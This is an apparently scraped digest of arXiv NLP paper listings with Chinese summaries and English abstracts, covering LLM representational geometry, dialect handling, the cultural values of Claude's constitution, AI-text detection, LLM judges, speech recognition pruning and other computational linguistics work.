Abstract:The paper proposes annotation guidelines for syntactic dependencies that span across speaker turns - including collaborative coconstructions proper, wh-question answers, and backchannels - in spoken language treebanks within the Universal Dependencies framework. Two representations are proposed: a speaker-based representation following the segmentation into speech turns, and a dependency-based representation with dependencies across speech turns. New propositions are also put forward to distinguish between reformulations and repairs, and to promote elements in unfinished phrases.
[NLP-20] Categorical Perception in Large Language Model Hidden States: Structural Warping at Digit-Count Boundaries
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在处理阿拉伯数字时是否存在类范畴知觉(Categorical Perception, CP)现象的问题,即模型内部表征是否在结构边界处(如10和100)表现出几何畸变,从而增强对类别边界的区分能力。解决方案的关键在于通过跨六种不同架构家族的LLM进行表征相似性分析(Representational Similarity Analysis, RSA),发现一种“CP加性模型”(log-distance加上边界增强项)比纯连续模型更准确地拟合了所有主层的表征几何结构;此外,研究识别出两类CP模式:一类是“经典CP”(如Gemma、Qwen),模型既显式分类又呈现几何畸变;另一类是“结构CP”(如Llama、Mistral、Phi),仅在边界处出现几何畸变但无法报告类别差异。这一结果表明,输入格式的结构性断点(如数字位数跃迁)足以独立于语义类别知识,在LLM中诱发类范畴知觉的几何特征。
链接: https://arxiv.org/abs/2603.28258
作者: Jon-Paul Cacioli
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 25 pages, 5 figures, 7 tables. Pre-registered on OSF ( this http URL ). Code at this https URL
Abstract:Categorical perception (CP) – enhanced discriminability at category boundaries – is among the most studied phenomena in perceptual psychology. This paper reports that analogous geometric warping occurs in the hidden-state representations of large language models (LLMs) processing Arabic numerals. Using representational similarity analysis across six models from five architecture families, the study finds that a CP-additive model (log-distance plus a boundary boost) fits the representational geometry better than a purely continuous model at 100% of primary layers in every model tested. The effect is specific to structurally defined boundaries (digit-count transitions at 10 and 100), absent at non-boundary control positions, and absent in the temperature domain where linguistic categories (hot/cold) lack a tokenisation discontinuity. Two qualitatively distinct signatures emerge: “classic CP” (Gemma, Qwen), where models both categorise explicitly and show geometric warping, and “structural CP” (Llama, Mistral, Phi), where geometry warps at the boundary but models cannot report the category distinction. This dissociation is stable across boundaries and is a property of the architecture, not the stimulus. Structural input-format discontinuities are sufficient to produce categorical perception geometry in LLMs, independently of explicit semantic category knowledge.
[NLP-21] textitVersteasch du mi? Computational and Socio-Linguistic Perspectives on GenAI LLM s and Non-Standard Language
【速读】: 该论文旨在解决生成式 AI(Generative AI)在语言模型设计中对非标准语言变体的忽视问题,进而加剧数字语言鸿沟与语言认知霸权的现状。其核心问题是:如何在技术上使大型语言模型(Large Language Models, LLMs)更好地处理非标准语言变体,并探讨这一改进是否以及在何种条件下能够支持“民主化和去殖民化的数字及机器学习策略”。解决方案的关键在于通过跨学科视角——结合批判性社会语言学与计算语言学——以南蒂罗尔方言和库尔德语变体为案例,系统分析语言多样性在模型训练与部署中的体现方式,并提出技术层面的适配路径与政策导向的伦理框架,从而推动更具包容性的语言技术发展。
链接: https://arxiv.org/abs/2603.28213
作者: Verena Platzgummer,John McCrae,Sina Ahmadi
机构: University of Galway (戈尔韦大学); University of Zurich (苏黎世大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:The design of Large Language Models and generative artificial intelligence has been shown to be “unfair” to less-spoken languages and to deepen the digital language divide. Critical sociolinguistic work has also argued that these technologies are not only made possible by prior socio-historical processes of linguistic standardisation, often grounded in European nationalist and colonial projects, but also exacerbate epistemologies of language as “monolithic, monolingual, syntactically standardized systems of meaning”. In our paper, we draw on earlier work on the intersections of technology and language policy and bring our respective expertise in critical sociolinguistics and computational linguistics to bear on an interrogation of these arguments. We take two different complexes of non-standard linguistic varieties in our respective repertoires–South Tyrolean dialects, which are widely used in informal communication in South Tyrol, Italy, as well as varieties of Kurdish–as starting points to an interdisciplinary exploration of the intersections between GenAI and linguistic variation and standardisation. We discuss both how LLMs can be made to deal with nonstandard language from a technical perspective, and whether, when or how this can contribute to “democratic and decolonial digital and machine learning strategies”, which has direct policy implications.
[NLP-22] Beyond Cosine Similarity: Zero-Initialized Residual Complex Projection for Aspect-Based Sentiment Analysis
【速读】: 该论文旨在解决Aspect-Based Sentiment Analysis (ABSA) 中存在的表示纠缠(representation entanglement)问题,即在实数嵌入空间中,方面语义(aspect semantics)与情感极性(sentiment polarities)常被混杂,导致细粒度情感分析性能受限;同时,标准对比学习因虚假负样本碰撞(false-negative collisions)问题,在高频方面上表现显著下降。解决方案的关键在于提出一种基于零初始化残差复数投影(Zero-Initialized Residual Complex Projection, ZRCP)的新型框架,并引入抗碰撞掩码角度损失(Anti-collision Masked Angle Loss)。该方法将文本特征映射到复数语义空间,利用相位分离情感极性,同时保持幅度编码语义强度和词汇丰富性;并通过抗碰撞掩码机制,在不破坏同极性方面内部凝聚力的前提下,将跨极性判别边界扩展超过50%,从而实现更鲁棒、精细的情感解耦。
链接: https://arxiv.org/abs/2603.28205
作者: Yijin Wang,Fandi Sun
机构: Xidian University (西安电子科技大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Aspect-Based Sentiment Analysis (ABSA) is fundamentally challenged by representation entanglement, where aspect semantics and sentiment polarities are often conflated in real-valued embedding spaces. Furthermore, standard contrastive learning suffers from false-negative collisions, severely degrading performance on high-frequency aspects. In this paper, we propose a novel framework featuring a Zero-Initialized Residual Complex Projection (ZRCP) and an Anti-collision Masked Angle Loss,inspired by quantum projection and entanglement ideas. Our approach projects textual features into a complex semantic space, systematically utilizing the phase to disentangle sentiment polarities while allowing the amplitude to encode the semantic intensity and lexical richness of subjective descriptions. To tackle the collision bottleneck, we introduce an anti-collision mask that elegantly preserves intra-polarity aspect cohesion while expanding the inter-polarity discriminative margin by over 50%. Experimental results demonstrate that our framework achieves a state-of-the-art Macro-F1 score of 0.8851. Deep geometric analyses further reveal that explicitly penalizing the complex amplitude catastrophically over-regularizes subjective representations, proving that our unconstrained-amplitude and phase-driven objective is crucial for robust, fine-grained sentiment disentanglement.
[NLP-23] DongYuan: An LLM -Based Framework for Integrative Chinese and Western Medicine Spleen-Stomach Disorders Diagnosis
【速读】: 该论文旨在解决整合中医与西医(Integrative Chinese and Western Medicine, ICWM)在脾-胃病诊断中面临的三大挑战:高质量数据匮乏、缺乏能够融合中医证候辨证与西医疾病诊断推理逻辑的模型,以及缺乏标准化的评估基准。解决方案的关键在于提出DongYuan框架,其核心包括三个组成部分:首先构建了三个高质量ICWM数据集(SSDF-Syndrome、SSDF-Dialogue和SSDF-PD),填补数据空白;其次开发了SSDF-Core——一个通过监督微调(Supervised Fine-Tuning, SFT)和直接偏好优化(Direct Preference Optimization, DPO)两阶段训练获得强大ICWM推理能力的诊断大语言模型;最后设计了SSDF-Navigator模块以优化临床问诊策略,并建立了SSDF-Bench评估基准用于系统性验证。实验表明,SSDF-Core在该基准上显著优于12个主流基线模型,为智能ICWM诊断系统的未来发展提供了方法论基础和技术参考。
链接: https://arxiv.org/abs/2603.28191
作者: Hua Li,Yingying Li,Xiaobin Feng,Xinyi Fu,Lifeng Dong,Qingfeng Yang,Yanzhe Chen,Xiaoju Feng,Zhidong Cao,Jianbin Guo,Yanru Du
机构: Beijing Wenge Technology Co., Ltd.(北京文革科技有限公司); Hebei Provincial Hospital of Traditional Chinese Medicine(河北省中医院); Institute of Automation, Chinese Academy of Sciences(中国科学院自动化研究所); Tianjin University(天津大学)
类目: Computation and Language (cs.CL)
备注: 13 pages, 6 figures
Abstract:The clinical burden of spleen-stomach disorders is substantial. While large language models (LLMs) offer new potential for medical applications, they face three major challenges in the context of integrative Chinese and Western medicine (ICWM): a lack of high-quality data, the absence of models capable of effectively integrating the reasoning logic of traditional Chinese medicine (TCM) syndrome differentiation with that of Western medical (WM) disease diagnosis, and the shortage of a standardized evaluation benchmark. To address these interrelated challenges, we propose DongYuan, an ICWM spleen-stomach diagnostic framework. Specifically, three ICWM datasets (SSDF-Syndrome, SSDF-Dialogue, and SSDF-PD) were curated to fill the gap in high-quality data for spleen-stomach disorders. We then developed SSDF-Core, a core diagnostic LLM that acquires robust ICWM reasoning capabilities through a two-stage training regimen of supervised fine-tuning. tuning (SFT) and direct preference optimization (DPO), and complemented it with SSDF-Navigator, a pluggable consultation navigation model designed to optimize clinical inquiry strategies. Additionally, we established SSDF-Bench, a comprehensive evaluation benchmark focused on ICWM diagnosis of spleen-stomach disorders. Experimental results demonstrate that SSDF-Core significantly outperforms 12 mainstream baselines on SSDF-Bench. DongYuan lays a solid methodological foundation and provides practical technical references for the future development of intelligent ICWM diagnostic systems.
[NLP-24] From Reviews to Requirements: Can LLM s Generate Human-Like User Stories?
【速读】: 该论文旨在解决从非结构化、非正式的移动应用商店评论中自动提取高质量用户故事(User Stories)以支持敏捷开发的需求。当前手动分析海量评论效率低下,而现有自动化方法在可复现性和输出质量上表现不佳,难以直接用于构建清晰的软件需求待办事项列表(backlog)。解决方案的关键在于利用大语言模型(Large Language Models, LLMs),特别是GPT-3.5 Turbo、Gemini 2.0 Flash和Mistral 7B Instruct,在零样本(zero-shot)、单样本(one-shot)和两样本(two-shot)提示策略下生成符合敏捷实践要求的用户故事,并通过RUST框架的人工评估与基于UStAI数据集微调的RoBERTa分类器进行质量验证。结果表明,LLMs在流畅性和格式规范性上可媲美甚至超越人类标注者,尤其在少样本提示场景下效果显著,但其在生成独立且独特用户故事方面仍存在局限,这限制了其对敏捷待办事项清单的直接贡献能力。
链接: https://arxiv.org/abs/2603.28163
作者: Shadman Sakib,Oishy Fatema Akhand,Tasnia Tasneem,Shohel Ahmed
机构: Islamic University of Technology (伊斯兰大学科技学院)
类目: Computation and Language (cs.CL)
备注:
Abstract:App store reviews provide a constant flow of real user feedback that can help improve software requirements. However, these reviews are often messy, informal, and difficult to analyze manually at scale. Although automated techniques exist, many do not perform well when replicated and often fail to produce clean, backlog-ready user stories for agile projects. In this study, we evaluate how well large language models (LLMs) such as GPT-3.5 Turbo, Gemini 2.0 Flash, and Mistral 7B Instruct can generate usable user stories directly from raw app reviews. Using the Mini-BAR dataset of 1,000+ health app reviews, we tested zero-shot, one-shot, and two-shot prompting methods. We evaluated the generated user stories using both human judgment (via the RUST framework) and a RoBERTa classifier fine-tuned on UStAI to assess their overall quality. Our results show that LLMs can match or even outperform humans in writing fluent, well-formatted user stories, especially when few-shot prompts are used. However, they still struggle to produce independent and unique user stories, which are essential for building a strong agile backlog. Overall, our findings show how LLMs can reliably turn unstructured app reviews into actionable software requirements, providing developers with clear guidance to turn user feedback into meaningful improvements. Subjects: Computation and Language (cs.CL) Cite as: arXiv:2603.28163 [cs.CL] (or arXiv:2603.28163v1 [cs.CL] for this version) https://doi.org/10.48550/arXiv.2603.28163 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Shadman Sakib [view email] [v1] Mon, 30 Mar 2026 08:31:18 UTC (841 KB)
[NLP-25] Does Claudes Constitution Have a Culture?
【速读】: 该论文旨在解决生成式 AI(Generative AI)在采用宪法式对齐(Constitutional AI, CAI)方法时可能引入的文化偏见问题,即当宪法由特定文化群体制定且训练数据主要来自同一文化背景时,模型是否会固化并放大此类偏见。其解决方案的关键在于通过跨文化评估实证检验CAI模型的价值倾向是否具有普遍性,发现Anthropic的Claude模型在多数价值维度上更贴近北欧及英语国家的价值观,并超出所有调查国的范围;此外,即便用户提供文化上下文,模型也仅调整修辞框架而不改变实质价值立场,表明当前CAI机制难以突破由训练数据和系统提示所设定的文化价值“地板”。
链接: https://arxiv.org/abs/2603.28123
作者: Parham Pourdavood
机构: Anthropic(Anthropic)
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 20 pages, 6 figures
Abstract:Constitutional AI (CAI) aligns language models with explicitly stated normative principles, offering a transparent alternative to implicit alignment through human feedback alone. However, because constitutions are authored by specific groups of people, the resulting models may reflect particular cultural perspectives. We investigate this question by evaluating Anthropic’s Claude Sonnet on 55 World Values Survey items, selected for high cross-cultural variance across six value domains and administered as both direct survey questions and naturalistic advice-seeking scenarios. Comparing Claude’s responses to country-level data from 90 nations, we find that Claude’s value profile most closely resembles those of Northern European and Anglophone countries, but on a majority of items extends beyond the range of all surveyed populations. When users provide cultural context, Claude adjusts its rhetorical framing but not its substantive value positions, with effect sizes indistinguishable from zero across all twelve tested countries. An ablation removing the system prompt increases refusals but does not alter the values expressed when responses are given, and replication on a smaller model (Claude Haiku) confirms the same cultural profile across model sizes. These findings suggest that when a constitution is authored within the same cultural tradition that dominates the training data, constitutional alignment may codify existing cultural biases rather than correct them–producing a value floor that surface-level interventions cannot meaningfully shift. We discuss the compounding nature of this risk and the need for globally representative constitution-authoring processes.
[NLP-26] MOSS-VoiceGenerator: Create Realistic Voices with Natural Language Descriptions
【速读】: 该论文旨在解决现有文本到语音(Text-to-Speech, TTS)模型在生成可控语音时缺乏真实人类语音的“生活质感”(lived-in qualities)的问题,即当前模型多基于精心录制的录音室数据训练,导致输出语音虽清晰规范但缺乏自然情感与个性特征。解决方案的关键在于提出 MOSS-VoiceGenerator——一个开源的指令驱动语音生成模型,其核心创新是利用来自电影内容的大规模表达性语音数据进行训练,从而增强模型对自然语言提示的响应能力与语音自然度,实验证明该方法在整体表现、指令遵循能力和语音自然性方面均优于现有语音设计模型。
链接: https://arxiv.org/abs/2603.28086
作者: Kexin Huang,Liwei Fan,Botian Jiang,Yaozhou Jiang,Qian Tu,Jie Zhu,Yuqian Zhang,Yiwei Zhao,Chenchen Yang,Zhaoye Fei,Shimin Li,Xiaogui Yang,Qinyuan Cheng,Xipeng Qiu
机构: SII-OpenMOSS Team*
类目: ound (cs.SD); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:Voice design from natural language aims to generate speaker timbres directly from free-form textual descriptions, allowing users to create voices tailored to specific roles, personalities, and emotions. Such controllable voice creation benefits a wide range of downstream applications-including storytelling, game dubbing, role-play agents, and conversational assistants, making it a significant task for modern Text-to-Speech models. However, existing models are largely trained on carefully recorded studio data, which produces speech that is clean and well-articulated, yet lacks the lived-in qualities of real human voices. To address these limitations, we present MOSS-VoiceGenerator, an open-source instruction-driven voice generation model that creates new timbres directly from natural language prompts. Motivated by the hypothesis that exposure to real-world acoustic variation produces more perceptually natural voices, we train on large-scale expressive speech data sourced from cinematic content. Subjective preference studies demonstrate its superiority in overall performance, instruction-following, and naturalness compared to other voice design models.
[NLP-27] Who Wrote the Book? Detecting and Attributing LLM Ghostwriters
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)生成文本的作者归属问题,即如何准确识别长篇文本(每本书超过5万词)的生成者,尤其是在分布外(out-of-distribution, OOD)场景下,如不同领域或未见过的LLM作者。解决方案的关键在于提出了一种名为TRACE的新颖指纹方法,该方法具有可解释性和轻量化特性,适用于开源与闭源模型。TRACE通过另一轻量级语言模型捕捉词元级别的转移模式(如词频排名),从而构建文本指纹,在GhostWriteBench数据集上的实验表明其在OOD设置中表现优异,且在训练数据有限的情况下仍具备强鲁棒性。
链接: https://arxiv.org/abs/2603.28054
作者: Anudeex Shetty,Qiongkai Xu,Olga Ohrimenko,Jey Han Lau
机构: The University of Melbourne (墨尔本大学); Macquarie University (麦考瑞大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:In this paper, we introduce GhostWriteBench, a dataset for LLM authorship attribution. It comprises long-form texts (50K+ words per book) generated by frontier LLMs, and is designed to test generalisation across multiple out-of-distribution (OOD) dimensions, including domain and unseen LLM author. We also propose TRACE – a novel fingerprinting method that is interpretable and lightweight – that works for both open- and closed-source models. TRACE creates the fingerprint by capturing token-level transition patterns (e.g., word rank) estimated by another lightweight language model. Experiments on GhostWriteBench demonstrate that TRACE achieves state-of-the-art performance, remains robust in OOD settings, and works well in limited training data scenarios.
[NLP-28] ransfer Learning for an Endangered Slavic Variety: Dependency Parsing in Pomak Across Contact-Shaped Dialects LREC26
【速读】: 该论文旨在解决濒危语言Pomak(一种东南斯拉夫语方言)的依存句法分析(Dependency Parsing)问题,特别是针对土耳其语变体与希腊语变体之间因语音和形态句法差异导致的跨方言迁移性能下降的问题。其解决方案的关键在于:首先通过零样本迁移实验量化不同方言间的性能损失;其次构建了一个包含650句的土耳其语变体手动标注语料库,并证明小规模数据上的针对性微调可显著提升模型准确性;最后引入跨方言迁移学习策略,融合两种方言数据进行联合训练,进一步优化整体性能。
链接: https://arxiv.org/abs/2603.28033
作者: Sercan Karakaş
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted to DialRes-LREC26 (Workshop on Dialects in NLP A Resource Perspective)
Abstract:This paper presents new resources and baselines for Dependency Parsing in Pomak, an endangered Eastern South Slavic language with substantial dialectal variation and no widely adopted standard. We focus on the variety spoken in Turkey (Uzunköprü) and ask how well a dependency parser trained on the existing Pomak Universal Dependencies treebank, which was built primarily from the variety that is spoken in Greece, transfers across dialects. We run two experimental phases. First, we train a parser on the Greek-variety UD data and evaluate zero-shot transfer to Turkish-variety Pomak, quantifying the impact of phonological and morphosyntactic differences. Second, we introduce a new manually annotated Turkish-variety Pomak corpus of 650 sentences and show that, despite its small size, targeted fine-tuning substantially improves accuracy; performance is further boosted by cross-variety transfer learning that combines the two dialects.
[NLP-29] Rethinking Atomic Decomposition for LLM Judges: A Prompt-Controlled Study of Reference-Grounded QA Evaluation
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在基于参考文本的判别任务中,原子分解式(atomic decomposition)提示方法是否真正优于整体式(holistic)提示方法的问题。现有做法通常将候选答案拆解为若干命题进行逐条验证,但这种设计可能因提示更丰富而带来性能提升,而非分解本身的有效性。论文的关键解决方案是构建一个自分解原子判官(self-decomposing atomic judge)与一个提示控制的整体判官(prompt-controlled holistic judge),两者使用相同的输入和详细评分标准,在TruthfulQA、ASQA和QAMPARI三个问答类基准上进行严格对比实验。结果表明,整体判官在两个基准(ASQA和QAMPARI)上表现不逊于甚至优于原子判官,尤其在识别部分支持(partially_supported)情形下优势明显,说明其核心价值在于对不完整性(incompleteness)的敏感性,而非提示复杂度带来的收益。
链接: https://arxiv.org/abs/2603.28005
作者: Xinran Zhang
机构: University of California, Berkeley (加州大学伯克利分校)
类目: Computation and Language (cs.CL)
备注:
Abstract:Atomic decomposition – breaking a candidate answer into claims before verifying each against a reference – is a widely adopted design for LLM-based reference-grounded judges. However, atomic prompts are typically richer and longer, making it unclear whether any advantage comes from decomposition or from richer prompting. We study this for benchmark-style completeness-sensitive reference-support classification: classifying a candidate as fully supported, partially supported, or unsupported relative to a supplied reference. We compare a self-decomposing atomic judge (single-prompt decompose-and-verify) against a prompt-controlled holistic judge with the same inputs and a similarly detailed rubric. On 200 source examples per dataset across TruthfulQA, ASQA, and QAMPARI, with four model families, source-level paired tests, cluster bootstrap, and aggregation across three pre-frozen prompt variants per design family, we find the holistic judge matches or exceeds the atomic judge on two of three benchmarks: ASQA and QAMPARI favor holistic across all four families (statistically reliable in three of four), while TruthfulQA shows a small atomic edge. The holistic advantage is concentrated in partially_supported cases – incompleteness detection. A sensitivity check against human annotations confirms the ranking under both benchmark-completeness and human factual-correctness standards. Our finding is specific to the self-decomposing single-prompt pattern on three QA-style benchmarks with 200 source examples each; multi-stage atomic pipelines and non-QA tasks remain untested. Among perturbations examined, reference-quality degradation produced the largest accuracy drops for both judge families.
[NLP-30] CDH-Bench: A Commonsense-Driven Hallucination Benchmark for Evaluating Visual Fidelity in Vision-Language Models
【速读】: 该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在面对视觉证据与常识冲突时的可靠性问题,即模型是否会优先遵循实际观察到的视觉信息,还是倾向于依赖先验常识进行推理。研究发现,即使先进VLMs也普遍存在“常识驱动型幻觉”(commonsense-driven hallucination, CDH)现象,即模型会忽略视觉证据而输出符合常识的答案。为系统评估此问题,作者提出CDH-Bench基准,通过设计三类明确的视觉-常识冲突场景(计数异常、关系异常和属性异常),并引入多项量化指标(如反事实准确率CF-Acc、常识准确率CS-Acc、常识崩溃率CCR等),实现了对模型视觉保真度的可控诊断。解决方案的关键在于构建具有结构化冲突设计的基准测试体系,并通过多维指标揭示模型对先验知识的依赖程度,从而识别其在真实场景中可能产生的偏差行为。
链接: https://arxiv.org/abs/2603.27982
作者: Kesheng Chen,Yamin Hu,Qi Zhou,Zhenqian Zhu,Wenjian Luo
机构: Harbin Institute of Technology, Shenzhen (哈尔滨工业大学深圳校区)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:Vision-language models (VLMs) achieve strong performance on many benchmarks, yet a basic reliability question remains underexplored: when visual evidence conflicts with commonsense, do models follow what is shown or what commonsense suggests? A characteristic failure in this setting is that the model overrides visual evidence and outputs the commonsense alternative. We term this phenomenon \textbfcommonsense-driven hallucination (CDH). To evaluate it, we introduce \textbfCDH-Bench, a benchmark designed to create explicit \textbfvisual evidence–commonsense conflicts. CDH-Bench covers three dimensions: \textitcounting anomalies, \textitrelational anomalies, and \textitattribute anomalies. We evaluate frontier VLMs under \textitbinary Question Answering (QA) and \textitmultiple-choice QA, and report metrics including \textitCounterfactual Accuracy (CF-Acc), \textitCommonsense Accuracy (CS-Acc), \textitCounterfactual Accuracy Drop (CFAD), \textitCommonsense Collapse Rate (CCR), and \textitRelative Prior Dependency (RPD). Results show that even strong models remain vulnerable to prior-driven normalization under visual evidence–commonsense conflict. CDH-Bench provides a controlled diagnostic of visual fidelity under visual evidence–commonsense conflict.
[NLP-31] On the Role of Encoder Depth: Pruning Whisper and LoRA Fine-Tuning in SLAM-ASR LREC2026
【速读】: 该论文旨在解决在SLAM-ASR(Speech-Language-Alignment Model for Automatic Speech Recognition)系统中,如何通过模型压缩(具体为层剪枝)在保持识别性能的同时降低计算成本的问题。其核心挑战在于:尽管已有研究探索了Whisper完整编码器-解码器架构的剪枝方法,但在以Whisper作为声学骨干网络的端到端ASR框架下,剪枝对系统性能的影响尚未充分理解。解决方案的关键在于:首先对Whisper编码器进行两层剪枝,在不显著牺牲识别精度(仅导致2–4% WER上升)的前提下减少参数量(7–14%);其次引入LoRA(Low-Rank Adaptation)微调机制来补偿剪枝带来的性能损失,实验表明该策略在多语言场景下可稳定提升性能,尤其在高资源语言(如英语、荷兰语)中通过利用语言模型(Language Model, LM)的先验知识有效减少词错误率(下降11–21%),但对低资源语言(如丹麦语)效果有限,且可能引入更多插入错误,揭示出LoRA补偿能力与预训练语言模型的语言掌握程度及训练数据丰富度密切相关。
链接: https://arxiv.org/abs/2603.27981
作者: Ganesh Pavan Kartikeya Bharadwaj Kolluri,Michael Kampouridis,Ravi Shekhar
机构: 未知
类目: Computation and Language (cs.CL); Sound (cs.SD)
备注: Accepted at SPEAKABLE Workshop, LREC 2026
Abstract:Automatic speech recognition (ASR) has advanced rapidly in recent years, driven by large-scale pretrained models and end-to-end architectures such as SLAM-ASR. A key component of SLAM-ASR systems is the Whisper speech encoder, which provides robust acoustic representations. While model pruning has been explored for the full Whisper encoder-decoder architecture, its impact within the SLAM-ASR setting remains under-investigated. In this work, we analyze the effects of layer pruning in the Whisper encoder when used as the acoustic backbone of SLAM-ASR. We further examine the extent to which LoRA-based fine-tuning can recover performance degradation caused by pruning. Experiments conducted across three Whisper variants (Small, Medium, Large-v2), three languages representing distinct resource levels (Danish, Dutch, English), and over 200 training runs demonstrate that pruning two encoder layers causes only 2-4% WER degradation, and that combining this pruning with LoRA adaptation consistently outperforms the unpruned baseline while reducing total parameters by 7-14%. Moreover, our error analysis reveals that LoRA primarily compensates through the language model’s linguistic priors, reducing total word errors by 11-21% for Dutch and English, with substitutions and deletions showing the largest reductions. However, for low-resource Danish, the reduction is smaller (4-7%), and LoRA introduces increased insertion errors, indicating that compensation effectiveness depends on the LLM’s pre-existing language proficiency and available training data.
[NLP-32] Efficient Inference of Large Vision Language Models
【速读】: 该论文旨在解决大型视觉语言模型(Large Vision Language Models, LVLMs)在推理阶段因计算资源需求庞大而导致的可扩展性与部署难题,尤其是高分辨率输入数据产生的大量视觉标记(visual tokens)加剧了注意力机制的二次复杂度问题。其解决方案的关键在于系统性地归纳和分析当前最先进的优化框架,并提出一个四维分类体系:视觉标记压缩、内存管理与服务策略、高效架构设计以及先进解码策略,从而为提升LVLM推理效率提供结构化指导并揭示未来研究方向。
链接: https://arxiv.org/abs/2603.27960
作者: Surendra Pathak
机构: 未知
类目: Machine Learning (cs.LG); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注: 12 pages
Abstract:Although Large Vision Language Models (LVLMs) have demonstrated impressive multimodal reasoning capabilities, their scalability and deployment are constrained by massive computational requirements. In particular, the massive amount of visual tokens from high-resolution input data aggravates the situation due to the quadratic complexity of attention mechanisms. To address these issues, the research community has developed several optimization frameworks. This paper presents a comprehensive survey of the current state-of-the-art techniques for accelerating LVLM inference. We introduce a systematic taxonomy that categorizes existing optimization frameworks into four primary dimensions: visual token compression, memory management and serving, efficient architectural design, and advanced decoding strategies. Furthermore, we critically examine the limitations of these current methodologies and identify critical open problems to inspire future research directions in efficient multimodal systems.
[NLP-33] EnsemJudge: Enhancing Reliability in Chinese LLM -Generated Text Detection through Diverse Model Ensembles NLPCC2025
【速读】: 该论文旨在解决中文生成式 AI (Generative AI) 文本检测的鲁棒性与准确性问题,尤其是在面对域外输入(out-of-domain inputs)或对抗样本(adversarial samples)时,现有方法性能下降显著,且多数研究集中于英文文本,缺乏对中文场景的有效支持。解决方案的关键在于提出 EnsemJudge 框架,该框架融合了针对中文文本特性的定制化策略与集成投票机制(ensemble voting mechanism),通过在 NLPCC2025 共享任务1提供的高质量中文数据集上训练与评估,实现了优于所有基线方法的检测性能,并获得第一名,验证了其在中文语境下检测生成文本的有效性与可靠性。
链接: https://arxiv.org/abs/2603.27949
作者: Zhuoshang Wang,Yubing Ren,Guoyu Zhao,Xiaowei Zhu,Hao Li,Yanan Cao
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted by NLPCC 2025 Shared Tasks
Abstract:Large Language Models (LLMs) are widely applied across various domains due to their powerful text generation capabilities. While LLM-generated texts often resemble human-written ones, their misuse can lead to significant societal risks. Detecting such texts is an essential technique for mitigating LLM misuse, and many detection methods have shown promising results across different datasets. However, real-world scenarios often involve out-of-domain inputs or adversarial samples, which can affect the performance of detection methods to varying degrees. Furthermore, most existing research has focused on English texts, with limited work addressing Chinese text detection. In this study, we propose EnsemJudge, a robust framework for detecting Chinese LLM-generated text by incorporating tailored strategies and ensemble voting mechanisms. We trained and evaluated our system on a carefully constructed Chinese dataset provided by NLPCC2025 Shared Task 1. Our approach outperformed all baseline methods and achieved first place in the task, demonstrating its effectiveness and reliability in Chinese LLM-generated text detection. Our code is available at this https URL.
[NLP-34] op-down string-to-dependency Neural Machine Translation
【速读】: 该论文旨在解决神经网络机器翻译(Neural Machine Translation, NMT)模型在处理长输入序列时性能下降的问题,尤其是在训练数据中未见或罕见的长句翻译任务中表现不佳。其解决方案的关键在于提出一种新颖的自顶向下、从左到右的句法解码机制(syntactic decoder),该机制以生成目标语言依存树(dependency tree)的方式替代传统的序列到序列(sequence-to-sequence)解码方式,从而提升模型对长输入文本的泛化能力。实验表明,这种基于语法结构的解码策略在未见过的长句翻译任务中显著优于传统方法。
链接: https://arxiv.org/abs/2603.27938
作者: Shuhei Kondo,Katsuhito Sudoh,Yuji Matsumoto
机构: RIKEN Center for Advanced Intelligence Project (理化学研究所先进智能项目中心); Nara Women’s University (奈良女子大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Most of modern neural machine translation (NMT) models are based on an encoder-decoder framework with an attention mechanism. While they perform well on standard datasets, they can have trouble in translation of long inputs that are rare or unseen during training. Incorporating target syntax is one approach to dealing with such length-related problems. We propose a novel syntactic decoder that generates a target-language dependency tree in a top-down, left-to-right order. Experiments show that the proposed top-down string-to-tree decoding generalizes better than conventional sequence-to-sequence decoding in translating long inputs that are not observed in the training data.
[NLP-35] Article and Comment Frames Shape the Quality of Online Comments
【速读】: 该论文试图解决的问题是:新闻文章的表述方式(即“框架”)是否会影响读者评论的质量,尤其是评论的健康程度(constructive, good-faith contributions)。此前研究已表明框架会影响评论内容,但未深入探讨其对质量的影响。论文通过分析2700篇新闻文章下的100万条评论,发现文章框架显著预测评论健康度,且采用与文章相同框架的评论更健康;此外,不健康的顶层评论会引发更多不健康的回复,这一现象独立于文章框架。解决方案的关键在于识别出“框架一致性”与评论健康之间的因果关联,并基于此构建了一个主动式的、基于大语言模型(LLM)的框架感知系统,用于缓解不良言论传播,从而将 framing theory 与在线话语质量建立实证联系并推动应用落地。
链接: https://arxiv.org/abs/2603.27889
作者: Matteo Guida,Yulia Otmakhova,Eduard Hovy,Lea Frermann
机构: The University of Melbourne (墨尔本大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Framing theory posits that how information is presented shapes audience responses, but computational work has largely ignored audience reactions. While recent work showed that article framing systematically shapes the content of reader responses, this paper asks: Does framing also affect response quality? Analyzing 1M comments across 2.7K news articles, we operationalize quality as comment health (constructive, good-faith contributions). We find that article frames significantly predict comment health while controlling for topic, and that comments that adopt the article frame are healthier than those that depart from it. Further, unhealthy top-level comments tend to generate more unhealthy responses, independent of the frame being used in the comment. Our results establish a link between framing theory and discourse quality, laying the groundwork for downstream applications. We illustrate this potential with a proactive frame-aware LLM- based system to mitigate unhealthy discourse
[NLP-36] HumMusQA: A Human-written Music Understanding QA Benchmark Dataset
